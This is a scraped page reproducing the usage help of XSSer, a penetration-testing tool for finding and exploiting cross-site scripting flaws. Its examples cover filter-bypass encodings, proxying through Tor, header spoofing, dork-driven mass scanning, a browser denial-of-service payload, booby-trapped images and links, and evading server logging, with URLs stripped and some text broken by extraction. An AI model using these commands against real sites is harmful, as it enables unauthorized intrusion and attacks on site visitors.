Sie sind auf Seite 1von 3

XSSer is an open source penetration testing tool that automates the process of d etecting and exploiting XSS injections

against different applications. It contains several options to try to bypass certain filters, and various specia l techniques of code injection. Usage python [-u -i -d ] [-p -g -c ] [OPTIONS] [Request] [Bypassing] [Tec hniques] Examples * Simple injection from URL: $ python -u "" ------------------* Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python -i "file.txt" --proxy "" --referer "666.6 66.666.666" ------------------* Multiple injections from URL, with fuzzing, using tor proxy, injecting on payl oads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python -u "" --proxy "" --Fuzz -Hex --verbose -w ------------------* Multiple injections from URL, with fuzzing, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP U ser-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python -u "" --Fuzz --Cem "Hex,Str,Hex" --user-agent " XSSer!!" --timeout "20" --threads "5" ------------------* Advance injection from File, payloading your -own- payload and using Unescape( ) character encoding to bypass filters: $ python -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d= "alert('XSS');\")";eval(a+b+c+d);' --Une ------------------* Injection from Dork selecting "duck" engine (XSSer Storm!): $ python --De "duck" -d "search.php?" ------------------* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!): $ python -c3 --Cw=4 -u "" ------------------* Simple injection from URL, using POST, with statistics results: $ python -u "" -p "index.php?target=search&subtarget=top &searchstring=" -s -------------------

* Multiple injections from URL to a parameter sending with GET, using Fuzzing, w ith IP Octal payloading ofuscation and printering results in a "tinyurl" shorter ed link (ready for share!): $ python -u "" -g "bs/?q=" --Fuzz --Doo --short tinyurl ------------------* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!): $ python -u "" -g "bs/?q=" --Coo --Anchor --Fr="!enter y our final injection code here!" ------------------* Simple injection from URL, using GET and trying to generate with results a "ma licious" shortered link ( with a valid DoS (Denegation Of Service) browser client payload: $ python -u "" -g "bs/?q=" --Dos --short "" ------------------* Multiple injections to multiple places, extracting targets from a list in a FI LE, applying Fuzzing, changing timeout to "20" and using multithreads (5 threads ), increasing delay between petitions to 10 seconds, injecting parameters in HTT P USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Oc tal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!): $ python -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads " 5" --delay "10" --Xsa --Xsr --Coo --proxy "" --Doo -s --ver bose --Dos --short "tinyurl" ------------------* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded. $ pyton --Imx "test.png" --payload "!enter your malicious injection cod e here!" ------------------* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file. $ python -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cu il.xml" ------------------* Publish output 'positives' injections of a dorking search (using "duck" dorker ) directly to (federated XSS pentesting botnet) $ python -d "login.php" --De "duck" --publish Download : Source :

0 comments Email This BlogThis! Share to Twitter Share to Facebook labels TOOLS